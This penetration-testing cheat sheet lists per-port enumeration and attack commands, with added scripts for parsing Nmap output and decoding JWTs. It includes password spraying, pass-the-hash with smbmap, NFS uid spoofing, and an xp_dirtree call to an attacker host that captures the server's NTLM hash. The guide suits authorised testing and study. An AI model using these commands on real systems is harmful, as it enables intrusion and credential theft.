Host Discovery

Portscanner – NMAP:
##To save time, first run a fast SYN scan (half-open) over all ports to find the open ones. Afterwards run a thorough scan with -sV -sC only against the identified ports, passed as a list to -p. -T4 is fast but noisy; lower it on fragile hosts or when stealth matters.
> nmap -p- -T4 -oA allports <target-ip>
> nmap -p22,80,445 -sC -sV -T4 -oA fullscan <target-ip>
##A full UDP sweep is very slow; if time is short restrict it to the most common ports with --top-ports <n>.
> nmap -sU -oA udpscan <target-ip>

##Grab all ports from the -p- Nmap scan and save them to a file called ports
##Print them on one line for copy&paste into -p of the thorough scan. Note that grep ^[0-9] matches every port line, not only the open ones (filtered ports slip in), and the loop leaves a trailing comma; strip it before pasting.
> cat allports.nmap | grep ^[0-9] | awk -F/ '{print $1}' | sort -un > ports
> for i in $(cat ports); do echo -n $i,; done
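The same port-extraction step as a small POSIX sh script, added here as an example (it is not code from the original page): it reads the allports.nmap text, keeps only ports in state open or open|filtered, sorts them numerically and emits the -sC -sV follow-up command without a trailing comma. The Nmap output below is a constructed sample; the host 10.10.10.10, the ports and the service names are made up for the example.

```shell
#!/bin/sh
# Added example, not from the original page: turn an "nmap -p- ... -oA allports"
# normal-output file into the port list for the thorough -sC -sV scan.
# Unlike "grep ^[0-9]" it keeps only open/open|filtered ports, sorts them
# numerically and produces no trailing comma.

# Constructed sample of allports.nmap; host, ports and services are invented.
SAMPLE_ALLPORTS='# Nmap 7.94 scan initiated Mon Jan  1 10:00:00 2024 as: nmap -p- -T4 -oA allports 10.10.10.10
Nmap scan report for 10.10.10.10
Host is up (0.012s latency).
Not shown: 65530 closed tcp ports (reset)
PORT      STATE    SERVICE
22/tcp    open     ssh
80/tcp    open     http
445/tcp   open     microsoft-ds
3389/tcp  open     ms-wbt-server
8080/tcp  filtered http-proxy

# Nmap done at Mon Jan  1 10:01:00 2024 -- 1 IP address (1 host up) scanned in 60.00 seconds'

# Print the open ports of an Nmap normal-output text as "22,80,445,3389".
# $1 = file contents. Port lines look like "22/tcp open ssh"; the "PORT STATE"
# header and the "# Nmap" lines do not match the port/protocol pattern.
extract_open_ports() {
    printf '%s\n' "$1" |
        awk '$1 ~ /^[0-9]+\/(tcp|udp)$/ && ($2 == "open" || $2 == "open|filtered") {
                 split($1, p, "/"); print p[1]
             }' |
        sort -un |
        paste -s -d ',' -
}

# Build the thorough follow-up scan for the ports found.
# $1 = file contents, $2 = target host.
followup_scan_cmd() {
    ports=$(extract_open_ports "$1")
    printf 'nmap -p%s -sC -sV -T4 -oA fullscan %s\n' "$ports" "$2"
}

# Stand-alone usage; with a real file: followup_scan_cmd "$(cat allports.nmap)" <target-ip>
followup_scan_cmd "$SAMPLE_ALLPORTS" 10.10.10.10
```

The filtered 8080/tcp in the sample is deliberately dropped: spending -sC -sV time on a port the firewall does not answer on is wasted, and including it is exactly what the plain grep ^[0-9] one-liner does.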

Screenshot websites:

##For quicker enumeration on large networks, take a screenshot of every web server to find the juicy stuff fast (LINK). aquatone reads the hosts from stdin and writes an HTML report into the current directory.
> cat hosts.txt | aquatone
> firefox aquatone_report.html

Enumerate Users over RPC:
## For Windows use the impacket example script (LINK)
> python3 <impacket script> 'username:password'@<target-ip>
##Or use rpcclient (-U '' -N for a null session)
> rpcclient -U 'username%password' <target-ip>
##From here, Tab lists all commands; enumdomusers lists the domain users directly
rpcclient $> lookupnames administrator
##Look up SIDs. The domain part (S-1-5-21-...) comes from the output of the previous command; replace XXXX with the RID: 500 is the built-in Administrator, 501 the Guest account, other well-known accounts and groups have RIDs below 1000, and user-created accounts start at 1000
rpcclient $> lookupsids S-1-5-21-*****-XXXX
## For Linux (Samba) use enum4linux
## enum4linux works against Windows hosts as well
> enum4linux -a <target-ip>



21 – FTP

Use find on FTP:
##The default ftp client does not support a "find" command. Use lftp instead; output of its commands can be piped to local shell commands.
> lftp user@host
lftp user@host:~> find . | grep config

Display hidden directories & files with lftp:
##Add the following line to /etc/lftp.conf (or ~/.lftprc), or type it at the lftp prompt, so that directory listings are requested with -a
> vim /etc/lftp.conf
set ftp:list-options -a

53 – DNS

DNS zone transfer:
##Find the authoritative name servers first (dig ns <domain>) and ask each of them for a transfer. A correctly configured server refuses AXFR to unknown clients, so a successful transfer is a finding in itself.
> dig axfr <domain> @<dns-server>

80, 443 – HTTP / HTTPS

Find Hidden Directories:
##Gobuster appends each word of the list to the end of the value of -u. To find subdirectories below a directory other than the root, for example below /admin/, pass -u http://<target-ip>/admin/ (Gobuster 3.x needs the dir subcommand: gobuster dir -u ...)
> gobuster -u http://<target-ip>/ -w wordlist.txt [-s statuscodes]
##wfuzz fuzzes the part of the URL where it finds "FUZZ" in the value of -u. With the --hX parameters you specify which responses to hide. For example --hh 123 hides all responses with a length of 123 characters; --hc hides by status code, --hl and --hw by line and word count.
> wfuzz -u http://<target-ip>/FUZZ -w /wordlists/list.txt [--hc / --hl / --hw / --hh <value>]

Live login dictionary attack (and password spraying):
##Use Burp to intercept one login attempt to get the content of the POST data (-d), and --hw with the word count of a failed-login response to hide failed logins. FUZZ in the password field tries a wordlist against one user; for actual spraying (one password against many users, which stays under lockout thresholds) put FUZZ in the username field and keep the password fixed.
> wfuzz -c --hw 42 -w wordlist.txt -d 'username=admin&password=FUZZ&submit=login' http://<target-ip>/<login-path>

Web server vulnerability scanner:
> nikto -host http://<target-ip>

Specific web app scanners:
> wpscan --url http://<target-ip>/
> joomscan -u http://<target-ip>/


161 UDP – SNMP

Get the community string via a dictionary:
##You can find a link to download SecLists in the "Helpful Links" section.
> onesixtyone -c /Seclist/Discovery/SNMP/common-snmp-community-strings.txt <target-ip>

Read out SNMP data:
##-c is the community string, which is often "public". -v2c or -v1 depends on the SNMP version; try both, neither has any authentication beyond the string itself. To get readable names instead of numeric OIDs, "apt install snmp-mibs-downloader" and comment out the "mibs :" line in /etc/snmp/snmp.conf
> snmpwalk -c public -v2c <target-ip>


139 / 445 – SMB

List SMB shares and access a specific share:
##Add -N (no password prompt) and -U '' to either command to try a null session
> smbclient -L <target-ip>
> smbclient //<target-ip>/<share-name>

Mount an SMB share to any destination (e.g. /mnt):
##Make sure the destination is not already mounted; unmount it first
##For a null session press Enter at the password prompt (empty password); for an authenticated mount pass -o username=<user>,password=<pass>
> umount /mnt
> mount -t cifs '//<target-ip>/<share-name>' /mnt


Unauthenticated listing of all content of an SMB share:
##Use -d localhost, the actual domain, or omit it, depending on the error message
> smbmap -H <target-ip> -u anonymous -d localhost


Connect to an SMB share via pass-the-hash and list all content recursively:
##The hash format is LMHASH:NTHASH. If you only have the NT hash, put the empty LM hash aad3b435b51404eeaad3b435b51404ee in front of it
> smbmap -u username -p 'LMHASH:NTHASH' -H <target-ip> -R

Print the ACL of every file after mounting; execute inside the mountpoint (inside /mnt for the previous example):
##-N uses a null session. The loop breaks on file names containing spaces, so use it for a quick overview only
> for i in $(ls); do echo $i; smbcacls -N '//<target-ip>/<share-name>' "$i"; done


389 – LDAP

Pull information like naming context, distinguished names and domain components:
> nmap -p 389 --script ldap-rootdse -Pn <target-ip>
> nmap -p 389 --script ldap-search -Pn <target-ip>
> ldapsearch -x -h <target-ip> -s base namingcontexts

With the naming context from the output above use ldapsearch (-x is simple bind, here anonymous; -s base returns only the base object, -s sub the whole subtree, which is also the default, so the last two commands are equivalent):
> ldapsearch -x -h <target-ip> -s base -b 'dc=<Nmap output>,dc=<Nmap output>'
> ldapsearch -x -h <target-ip> -s sub -b 'dc=<Nmap output>,dc=<Nmap output>'
> ldapsearch -x -h <target-ip> -b 'dc=<Nmap output>,dc=<Nmap output>'

Pull data with an authenticated user:
## Use the distinguished name of the user with -D; -W prompts for the password. Newer ldapsearch versions deprecate -h in favour of -H ldap://<target-ip>
> ldapsearch -x -h <target-ip> -D "CN=User,OU=..,DC=..,DC=.." -W -b 'dc=..,dc=..'


1433 MS-SQL

Connect to the MSSQL database via impacket (LINK):
> <impacket script> username@<target-ip> -windows-auth

From the impacket SQL shell, make the SQL Server service account connect to an attacker-controlled SMB share to capture its Net-NTLM hash (responder needs to be listening on the attacker host). The captured challenge-response hash can be cracked or relayed but not used for pass-the-hash:
> xp_dirtree '\\<attacker-ip>\offensiveShare\'


2049 – NFS Network File System

##Make sure to apt install nfs-common
> showmount -e <target-ip>
##Try version 2 (or 3) first: with the default sec=sys there is no real authentication, the server simply trusts the uid/gid the client presents, so the client is responsible for authorization. A "permission denied" therefore means your local uid does not match the owner of the files: check the numeric owner with ls -ln and give a local user that uid. Root is normally mapped to nobody on the server (root_squash), which is why matching a non-root uid is what usually works.
> mount -t nfs -o vers=2 <target-ip>:/<share> /mnt/point
##Example: ls -ln shows files owned by uid 1002. Create a local user with that uid, "useradd -u 1002 offensive", or edit the uid field of an existing user in /etc/passwd, e.g. offensive:x:1002:2004::/home/offensive:/bin/sh, then su to that user and access the share.


3000 – Node.js

##Try to authenticate against Node.js using HTTP Basic authentication
> curl http://username:password@<target-ip>:3000/

##Try to log in by POSTing credentials to the login endpoint (the parameter names, and whether the body is form-encoded or JSON, may have to be guessed)
> curl -X POST -d 'user=admin&password=admin' http://<target-ip>:3000/<login-path>
> curl -X POST -d 'username=admin&password=admin' http://<target-ip>:3000/<login-path>

##Decode the returned token to get information, for example if it is a JWT: header and payload are plain base64url-encoded JSON and readable without the key (decoding is not verification; the signature still has to be checked by the server)
##Use the token inside a header (depends on the token; a Bearer header for a JWT)
> curl -H 'Authorization: Bearer insert_token_here' http://<target-ip>:3000/<path>
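Decoding the JWT mentioned above from the shell, as an added example that is not part of the original page: the header and payload are base64url (alphabet '-' and '_', padding stripped), so they have to be translated back to standard base64 and padded before base64 -d accepts them. The token below is a constructed sample (the widely published "John Doe" demo token); its third part is an arbitrary string because the signature is never decoded or verified here.

```shell
#!/bin/sh
# Added example, not from the original page: read the header and payload of a
# JWT without the signing key. Only the signature (third part) is left alone,
# so this is decoding, not verification.

# Constructed sample token; the signature part is arbitrary and not checked.
SAMPLE_JWT='eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.signature-not-checked'

# Decode part $2 (1 = header, 2 = payload) of token $1.
# base64url uses '-' and '_' instead of '+' and '/' and drops the '=' padding,
# so translate the alphabet and restore the padding before calling base64 -d.
jwt_decode_part() {
    part=$(printf '%s' "$1" | cut -d. -f"$2" | tr '_-' '/+')
    pad=$(( (4 - ${#part} % 4) % 4 ))
    while [ "$pad" -gt 0 ]; do
        part="${part}="
        pad=$((pad - 1))
    done
    printf '%s' "$part" | base64 -d
}

# The alg claim is worth reading first: "none" or a weak HMAC secret are the
# classic things to test next, and the payload shows which claims
# (sub, role, exp, ...) the application trusts.
jwt_alg() {
    jwt_decode_part "$1" 1 | sed 's/.*"alg" *: *"\([^"]*\)".*/\1/'
}

# Stand-alone usage:
jwt_decode_part "$SAMPLE_JWT" 1; echo
jwt_decode_part "$SAMPLE_JWT" 2; echo
echo "alg: $(jwt_alg "$SAMPLE_JWT")"
```

Anything printed by this is attacker-readable by design; the security of a JWT rests entirely on the signature check, which is why the payload never belongs in a token if it must stay confidential.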